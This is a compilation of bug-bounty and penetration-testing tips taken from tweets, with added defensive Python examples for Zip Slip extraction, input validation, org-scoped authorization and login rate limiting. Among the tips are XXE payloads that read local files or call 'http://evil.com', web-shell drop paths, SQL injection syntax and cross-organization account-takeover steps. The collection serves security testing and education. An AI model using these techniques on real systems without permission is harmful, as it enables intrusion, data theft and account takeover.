# | Category | Tweet | Subtweet | Likes | Retweets
Source: https://twitter.com/InonShkedy

#26 | Path Manipulation | Likes: 216 | Retweets: 67
App allows uploading .zip/rar archives?
There's a good chance it's vulnerable to Zip Slip.
Put the malicious file inside a zip, edit zip using HexEditor, use directory traversal to change final dest.
* Try both 1st&2nd occurrences separately
Subtweet: https://pbs.twimg.com/media/E7Ri4pJX0AE4gba?format=jpg&name=large

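The defensive counterpart to the Zip Slip tip, added here as an example and not taken from the tweet: an extraction routine that refuses any archive entry whose resolved destination leaves the target directory. It uses only the Python standard library; the archive it unpacks is constructed in memory, and every path in it is made up.

```python
"""Zip Slip defence: extract archive entries only if their final path stays inside
the intended directory.  Added example, not code from the tweet; the archive
below is constructed in memory so the script runs offline."""
import io
import os
import tempfile
import zipfile


def is_within(base: str, target: str) -> bool:
    """True when `target` resolves to a location inside `base`.

    Both paths are resolved first, so "../" sequences, repeated separators and
    symlinked parents cannot make a path that merely looks contained escape.
    """
    base = os.path.realpath(base)
    target = os.path.realpath(target)
    return os.path.commonpath([base, target]) == base


def safe_extract(zip_bytes: bytes, dest_dir: str) -> tuple[list[str], list[str]]:
    """Extract into dest_dir; return (written entry names, rejected entry names).

    A hex-edited entry name such as "../../outside.txt" is rejected, not written.
    """
    written: list[str] = []
    rejected: list[str] = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            parts = name.replace("\\", "/").split("/")
            # Absolute names, drive letters and any ".." component are refused up front.
            if name.startswith(("/", "\\")) or os.path.splitdrive(name)[0] or ".." in parts:
                rejected.append(name)
                continue
            target = os.path.join(dest_dir, *parts)
            # Second, independent check on the resolved destination.
            if not is_within(dest_dir, target):
                rejected.append(name)
                continue
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
            else:
                os.makedirs(os.path.dirname(target), exist_ok=True)
                with zf.open(info) as src, open(target, "wb") as dst:
                    dst.write(src.read())
            written.append(name)
    return written, rejected


def build_sample_zip() -> bytes:
    """Constructed archive: one benign entry and one traversal entry."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "hello")
        zf.writestr("../../outside.txt", "escaped")  # the Zip Slip entry
    return buf.getvalue()


def demo() -> tuple[list[str], list[str]]:
    """Run safe_extract on the sample archive inside a throwaway directory."""
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "uploads", "extracted")
        os.makedirs(dest)
        return safe_extract(build_sample_zip(), dest)


if __name__ == "__main__":
    written, rejected = demo()
    print("written :", written)
    print("rejected:", rejected)
```

The two checks are deliberately redundant: the lexical `..` test catches the obvious edit, and `is_within` catches anything the lexical test misses (symlinked parents, odd separators), which is the check to keep even if a framework's own extractor already does the first.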
#8 | IDK | Likes: 191 | Retweets: 73
White-box Pentest?
Learn the dangerous functions of the tested language.
Java: https://stackoverflow.com/a/4351516
.NET: https://stackoverflow.com/a/20903746
PHP: https://stackoverflow.com/a/3115645
Ruby: https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html
(Or simply Google: [language] + security best practices)
Source: https://twitter.com/traceableai

#28 | File Upload | Likes: 178 | Retweets: 44
Picture upload feature?
[1] Upload an image and check the URL
[2] If the file isn't stored on CDN -->
[3] Upload an HTML file with script tags
[4] If the upload is completed successfully, it might be an XSS

#13 | Detailed Errors | Likes: 145 | Retweets: 39
How to find detailed errors in APIs?
1. Send a string instead of a number (age=ddd)
2. Remove necessary params (e.g., send a PM and remove "receiver_name" param)
3. Break JSON structure (remove '}')
4. Remove necessary headers/cookies

#29 | Recon | Likes: 131 | Retweets: 15
Before a pentest, I always:
1. Use the app as a regular user to understand the BL
2. Create 2 users
3. Map all features allowing interaction between users (Inbox, invites, co-riders); these are usually a good place to find AuthZ issues

#25 | CSRF | Likes: 128 | Retweets: 43
API with JWT in AuthZ header?
1. Copy JWT b64 value
2. Add new cookies - "auth_token", "jwt_token", "jwt", paste b64 as value
3. Duplicate previous API call, add cookies, remove header.
4. Works? AuthN supports cookies
5. API is 90% vulnerable to CSRF

#30 | IDK | Likes: 100 | Retweets: 20
Best bug bounty tip I've received:
Always focus on the most niche features that are hidden from the main dashboard.
They are less likely to be covered in a pentest, and developers usually invest less time in securing them.
[Examples in sub-tweet]
- Features that were exposed temporarily, such as "create Christmas greeting card" or "black Friday lottery"
- Dashboards that are exposed to a limited set of users (Uber: Uber-eats drivers | FB: app developers | Airline: portal for gold members)
- Old versions of the API

#31 | Mental Health | Likes: 93 | Retweets: 17
Bug bounty hunting is a stressful job.
If you find yourself getting overwhelmed after not finding vulns, remind yourself that some apps are just more secure than others.
Apply mindfulness to your daily routine and meditate between RCEs 🧘‍♂️

#11 | GraphQL | Likes: 90 | Retweets: 25
Recently learned:
Grafana dashboards tend to use ElasticSearch API.
In 30% of the times I've tested, they were vulnerable to a simple attack:
If GraphQL query to Elastic contains a "filter"/"filter_id", remove it, and get access to other users' info.
Also relevant for Kibana

#27 | Detailed Errors | Likes: 88 | Retweets: 28
Find detailed errors:
[1] Send array instead of primitive (age=[21] instead of age=21)
[2] Send a Unicode char in HTTP method (G✔️T)
[3] Send long Unicode string (age=✔️x100)
[4] If the API receives a URL, remove semicolon (http// instead of http://)

#10 | XXE | Likes: 87 | Retweets: 28
Found XXE? Leverage it for:
* DoS: XML Bomb
* LFI: <!ENTITY xxe SYSTEM "file://path">
** Try 2 slashes (Windows) and 3 (Linux) in path
* SSRF: <!ENTITY xxe SYSTEM "http://evil.com">
** Try different protocols [ssh,ftp,etc]

#18 | Recon | Likes: 80 | Retweets: 13
Before a pentest, I always:
1. Use Burp to catch browser traffic
2. Use the target app legitimately, trying to use all buttons, views, dashboards, etc
3. Use Burp Tree View to understand better the app, including... [in sub tweet]
- Which EPs contain IDs
- Does the app have sub APIs?
- With which external services does the client-app communicate?

#24 | AuthZ | Likes: 78 | Retweets: 21
Where I usually find IDOR (BOLA) in apps is in features that allow extracting data as files.
* "download_report/org_id=11"
* "my_activity_as_pdf?user_id=22"
These are often developed by different teams that don't fully understand the AuthZ mechanism

#5 | Injection | Likes: 61 | Retweets: 12
SQLi --> RCE
[1/2] Look for tables containing records that look like file paths/URLs. Internal systems might use SQL as part of scheduled jobs/updates mechanisms. Change the value to a path/URL of a malicious file
Subtweet: https://pbs.twimg.com/media/E5lODzjXMAI92Em?format=jpg&name=large

#19 | AuthZ | Likes: 60 | Retweets: 20
B2B apps often have a "manage your organization" feature - fertile ground for vulns!
[1] Create 2 users belonging to different orgs
[2] Login as user2 from org2
[3] Add user1 from org1 to your org
[4] Find "get/export org users" API
[5] Leak user1 info
Subtweet: https://pbs.twimg.com/media/E6thB1aXsBoL7yJ?format=jpg&name=medium

#20 | AuthZ | Likes: 46 | Retweets: 21
B2B apps often have an "invite user to your org" feature.
1. Invite an existing user to your org
2. Learn how the API call "accept_invite" looks using a dummy user
3. Accept the invite on behalf of the victim
4. Once the victim is in your org - game over
Subtweet: https://pbs.twimg.com/media/E6y2oG0WYAMd-Pr?format=jpg&name=medium

#23 | AuthZ | Likes: 42 | Retweets: 9
API allows sending a private message?
Try to change the "receiver_id" to an array instead of a single string/int. Might be used as a way to spam the system.

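The server-side answer to the three input-handling tips above (#13 and #27 on provoking detailed errors, #23 on an array in "receiver_id"), added here as an example that is not from the tweets: a strict validator that refuses wrong types, arrays where a scalar is expected, missing required fields and broken JSON, returns one generic error to the client, and keeps the precise reason in a server-side log. The schema, the endpoint name and the sample requests are constructed.

```python
"""Strict request validation for a JSON API: type confusion, arrays where a scalar
is expected, missing required fields and broken JSON are all refused with one
generic error, while the precise reason is logged server-side.  Added example,
not code from the tweets; schema, endpoint and sample requests are constructed."""
import json
from typing import Any


class ValidationError(Exception):
    pass


# Constructed schema for a "send private message" endpoint: name -> (type, required).
MESSAGE_SCHEMA: dict[str, tuple[type, bool]] = {
    "receiver_id": (int, True),
    "body": (str, True),
    "age": (int, False),
}
MAX_STRING_LEN = 2000

INTERNAL_LOG: list[str] = []  # stands in for the server-side log


def validate(raw: bytes, schema: dict[str, tuple[type, bool]]) -> dict[str, Any]:
    """Return a cleaned dict or raise ValidationError with the exact reason."""
    try:
        payload = json.loads(raw)
    except (ValueError, UnicodeDecodeError) as exc:
        raise ValidationError(f"malformed JSON: {exc}") from None
    if not isinstance(payload, dict):
        raise ValidationError("body is not a JSON object")
    unknown = set(payload) - set(schema)
    if unknown:
        raise ValidationError(f"unknown fields: {sorted(unknown)}")
    clean: dict[str, Any] = {}
    for name, (expected, required) in schema.items():
        if name not in payload:
            if required:
                raise ValidationError(f"missing required field: {name}")
            continue
        value = payload[name]
        # bool is a subclass of int in Python, so it must be excluded explicitly.
        if expected is int and isinstance(value, bool):
            raise ValidationError(f"{name}: bool is not an int")
        # A list, object or string where an int is expected (age=[21],
        # receiver_id=[..], age="ddd") fails here.
        if not isinstance(value, expected):
            raise ValidationError(
                f"{name}: expected {expected.__name__}, got {type(value).__name__}"
            )
        if expected is str and len(value) > MAX_STRING_LEN:
            raise ValidationError(f"{name}: longer than {MAX_STRING_LEN}")
        clean[name] = value
    return clean


def handle_send_message(raw: bytes) -> tuple[int, dict[str, Any]]:
    """Return (status, public JSON body).  The public body never carries the reason."""
    try:
        clean = validate(raw, MESSAGE_SCHEMA)
    except ValidationError as exc:
        INTERNAL_LOG.append(f"send_message rejected: {exc}")
        return 400, {"error": "invalid request"}
    return 200, {"sent_to": clean["receiver_id"]}


if __name__ == "__main__":
    for sample in (
        b'{"receiver_id": 7, "body": "hi"}',
        b'{"receiver_id": [7, 8], "body": "hi"}',
        b'{"receiver_id": 7, "body": "hi", "age": [21]}',
        b'{"body": "hi"}',
        b'{"receiver_id": 7, "body": "hi"',
    ):
        print(handle_send_message(sample))
    print(INTERNAL_LOG)
```

The split between `validate` (detailed reason, raised) and `handle_send_message` (generic response) is the point: the detailed error is still produced, but it goes to the log where operators can read it, not to the caller.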
#16 | AuthN | Likes: 41 | Retweets: 15
-- Protection for AuthN EPs --
1. Rate limiting - require captcha/block IP addresses that accessed too many times
2. Account lockout - Many failed attempts to authenticate as user X? Block access to user X for some time.
3. Captcha always recommended

#1 | Recon | Likes: 39 | Retweets: 11
Targeting a specific company and looking to expand your attack surface?
Use Yandex/Google's "Search by photo" feature to search their logo and find more domains/sub-domains.

#2 | Recon | Likes: 39 | Retweets: 11
Testing a web app that requires AuthN but you don't have a user? <part 1/2>
[1] use Google "site:[host]" to find sub-pages; some of them might not enforce AuthN
[2] access /home, /default and use DirBuster to find more sub-pages

#21 | AuthZ | Likes: 38 | Retweets: 10
B2B apps often provide an "impersonate user" feature to org admins.
[1] Create an org admin user
[2] Learn the API call to "impersonate_user"
[3] Try to delegate to a user from a different org
[4] Might lead to a full account takeover
Subtweet: https://pbs.twimg.com/media/E631R3BWYAAdxUS?format=jpg&name=medium

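The org-scoping rules that close the three B2B findings above (#19 exporting org users, #20 accepting an invite on someone else's behalf, #21 impersonating across orgs), added here as an example that is not the code of any product: every check is made against the caller's own org and identity, never against an org_id or user_id supplied in the request. The data model, the service and all identifiers are constructed for the demo.

```python
"""Org-scoped authorization for B2B "manage your organization" features:
exporting org users, accepting invites and impersonating users all check the
caller's own org and identity, never an org_id or user_id taken from the
request.  Added example, not the code of any product; data model and
identifiers are constructed."""
from dataclasses import dataclass, field


class Forbidden(Exception):
    pass


@dataclass
class User:
    user_id: int
    org_id: int
    is_org_admin: bool = False


@dataclass
class Invite:
    invite_id: str
    org_id: int
    invitee_user_id: int  # bound to one account; nobody else can accept it
    accepted: bool = False


@dataclass
class OrgService:
    users: dict[int, User]
    invites: dict[str, Invite] = field(default_factory=dict)

    def export_org_users(self, caller: User) -> list[int]:
        """Scoped by the caller's org; any request-supplied org_id is ignored."""
        return sorted(u.user_id for u in self.users.values() if u.org_id == caller.org_id)

    def create_invite(self, caller: User, invite_id: str, invitee_user_id: int) -> Invite:
        """Only an org admin can invite.  Membership changes only through an
        accepted invite, so there is no 'add user to my org' call that skips consent."""
        if not caller.is_org_admin:
            raise Forbidden("only org admins can invite")
        invite = Invite(invite_id, caller.org_id, invitee_user_id)
        self.invites[invite_id] = invite
        return invite

    def accept_invite(self, caller: User, invite_id: str) -> None:
        """The accepting user must be the invitee; the inviter cannot accept for them."""
        invite = self.invites.get(invite_id)
        if invite is None or invite.accepted or invite.invitee_user_id != caller.user_id:
            raise Forbidden("invite is not addressed to this user")
        invite.accepted = True
        caller.org_id = invite.org_id

    def impersonate(self, caller: User, target_user_id: int) -> User:
        """Impersonation stays inside the admin's own org and never targets another admin."""
        target = self.users.get(target_user_id)
        if (not caller.is_org_admin or target is None
                or target.org_id != caller.org_id or target.is_org_admin):
            raise Forbidden("target is outside the caller's org or is privileged")
        return target


def demo() -> dict[str, object]:
    """Replay the three cross-org attempts against the guarded service."""
    user1 = User(user_id=1, org_id=1)                      # member of org 1
    admin2 = User(user_id=2, org_id=2, is_org_admin=True)  # admin of a different org
    member2 = User(user_id=3, org_id=2)
    svc = OrgService(users={1: user1, 2: admin2, 3: member2})
    results: dict[str, object] = {}

    results["export_from_org2"] = svc.export_org_users(admin2)  # nothing from org 1

    svc.create_invite(admin2, "inv-1", invitee_user_id=1)
    try:
        svc.accept_invite(admin2, "inv-1")  # inviter tries to accept for the invitee
        results["accept_as_inviter"] = "allowed"
    except Forbidden:
        results["accept_as_inviter"] = "forbidden"

    try:
        svc.impersonate(admin2, 1)  # cross-org impersonation
        results["impersonate_cross_org"] = "allowed"
    except Forbidden:
        results["impersonate_cross_org"] = "forbidden"

    results["impersonate_same_org"] = svc.impersonate(admin2, 3).user_id
    return results


if __name__ == "__main__":
    print(demo())
```

The pattern to notice is that `export_org_users` and `impersonate` take no org parameter at all: the org comes from the authenticated caller, so there is nothing in the request for a tester to change.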
#3 | Recon | Likes: 29 | Retweets: 8
-2nd part-
[3] download JS and look for strings like "create_user"/"register"; you might find AuthN API EPs and use them to register directly.
[4] use http://bugmenot.com or http://login2.me to find credentials

#4 | Path Manipulation | Likes: 27 | Retweets: 13
File Upload --> RCE
[1] Windows: Malicious file to C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
[2] IIS: web-shell to C:\inetpub\wwwroot
[3] Apache: web-shell to /var/www/html/
* Keep in mind that in many cases the translation of [physical path] --> [virtual directory] isn't straightforward; the best thing you can do is to find an "arbitrary file download" vuln, scan the server and find the physical location of the virtual directory. *

#9 | XXE | Likes: 24 | Retweets: 5
My favorite XXE --> RCE finding:
[1] XML Parser supports "gopher://" - SSRF on steroids!
[2] Java debugger running locally and supports "Telnet Debugging" 🤨
[4] Read debugger doc
[5] Malicious payload uses gopher to call debugger and run raw Java code 🤠

#14 | Injection | Likes: 21 | Retweets: 3
Found a SQLi? DB doesn't have interesting data?
Find tables that store website content, and leverage it to cause stored XSS.
Subtweet: https://pbs.twimg.com/media/E6Q7RNdWYAAfPyY?format=png&name=small

#7 | Injection | Likes: 18 | Retweets: 4
SQLi --> SSRF
Use functions to trigger HTTP calls
Oracle: UTL_HTTP.request
MSSQL: master..xp_dirtree
More info:
https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/

#22 | AuthZ | Likes: 16 | Retweets: 3
App provides "impersonate user" feature?
Check if the app changes your auth_token after impersonation; If it does - make sure the impersonation token follows best practices (https://auth0.com/docs/best-practices/token-best-practices)
It often doesn't!

#6 | Injection | Likes: 15 | Retweets: 3
SQLi --> RCE [2/2]
Always look for customized stored procedures that were written by DBAs.
The procedures might use dangerous PLSQL/T-SQL funcs that your SQL payload can't access directly

#12 | AuthN | Likes: 11 | Retweets: 1
Common misconception: AuthN EPs == Login EPs. That's wrong!
* Credentials Recovery
* Login using magic links/1 time code
* Admin "View as..."
All should be considered as AuthN EPs as well, and require additional protection (rate limiting, etc)

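One way to implement the protections from the two AuthN tips (#16 on rate limiting and account lockout, #12 on which endpoints count as AuthN), added here as an example and not taken from the tweets: a single guard whose per-IP window and per-account lockout are shared by login, credential recovery and one-time-code endpoints, so hammering /recover cannot sidestep a lock earned on /login. The class, thresholds, IP addresses and the attempt sequence are constructed; the clock is passed in so the demo runs deterministically.

```python
"""Rate limiting and account lockout shared by every authentication endpoint:
login, credential recovery, magic-link/one-time-code and admin "view as".
Added example, not code from the tweets; thresholds, addresses and the attempt
sequence are constructed, and `now` is injected instead of reading a clock."""
from collections import defaultdict, deque


class AuthGuard:
    def __init__(self, ip_limit: int = 10, ip_window: int = 60,
                 lock_threshold: int = 5, lock_seconds: int = 900) -> None:
        self.ip_limit, self.ip_window = ip_limit, ip_window
        self.lock_threshold, self.lock_seconds = lock_threshold, lock_seconds
        self.ip_hits: dict[str, deque] = defaultdict(deque)   # ip -> attempt times in window
        self.failures: dict[str, int] = defaultdict(int)       # account -> consecutive failures
        self.locked_until: dict[str, float] = {}               # account -> unlock time
        self.audit: list[str] = []                             # stands in for the auth log

    def _ip_over_limit(self, ip: str, now: float) -> bool:
        """Sliding window: count attempts from this IP in the last ip_window seconds."""
        hits = self.ip_hits[ip]
        while hits and hits[0] <= now - self.ip_window:
            hits.popleft()
        hits.append(now)
        return len(hits) > self.ip_limit

    def attempt(self, endpoint: str, ip: str, account: str,
                credential_ok: bool, now: float) -> str:
        """Return "ok", "denied", "locked" or "rate_limited".

        `endpoint` is only logged: the counters deliberately ignore which AuthN
        endpoint was used, so /recover and /otp share /login's limits.
        A locked account is refused even when the credential is correct, so the
        response does not reveal whether the guess was right.
        """
        self.audit.append(f"{endpoint} ip={ip} account={account} t={now}")
        if self._ip_over_limit(ip, now):
            return "rate_limited"            # serve a captcha or block the IP here
        if self.locked_until.get(account, 0) > now:
            return "locked"
        if credential_ok:
            self.failures[account] = 0
            return "ok"
        self.failures[account] += 1
        if self.failures[account] >= self.lock_threshold:
            self.locked_until[account] = now + self.lock_seconds
            self.failures[account] = 0
            return "locked"
        return "denied"


def demo() -> list[str]:
    """Constructed sequence: lockout spanning two endpoints, then a per-IP flood."""
    g = AuthGuard()
    out = []
    # Four wrong passwords on /login, then a wrong one-time code on /otp:
    # the fifth failure locks the account regardless of endpoint.
    for t in range(4):
        out.append(g.attempt("/login", "203.0.113.5", "alice", False, now=t))
    out.append(g.attempt("/otp", "203.0.113.5", "alice", False, now=4))
    # The correct password from another IP is still refused while locked.
    out.append(g.attempt("/login", "198.51.100.7", "alice", True, now=10))
    # After the lock expires the correct password is accepted.
    out.append(g.attempt("/login", "198.51.100.7", "alice", True, now=4 + 900 + 1))
    # Eleven recovery requests in one minute from one IP trip the per-IP limit.
    flood = [g.attempt("/recover", "192.0.2.9", f"user{i}", False, now=1000 + i)
             for i in range(11)]
    out.append(flood[-1])
    return out


if __name__ == "__main__":
    print(demo())
```

Account lockout on its own creates a denial-of-service lever against known usernames, which is why the tweet pairs it with rate limiting and captcha rather than relying on one control; the lock here is time-limited for the same reason.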
#15 | IDK
What's your funniest pentest story?
I once found a stored XSS in a forum, left a silly "EVIL" alert that impacted all users; they had no "remove thread" feature; had to find a SQLi to remove it 🙃

#17 | Injection
Testing for SQLi? Always remember the DBs are different. Especially concatenation & comments.
MSSQL: abc' + 'def --
MySQL: 'abc' || 'def' #
Oracle: abc' || 'def' --
* keep in mind that /*comments*/ format usually won't work inside an injection

Total | Likes: 2132 | Retweets: 582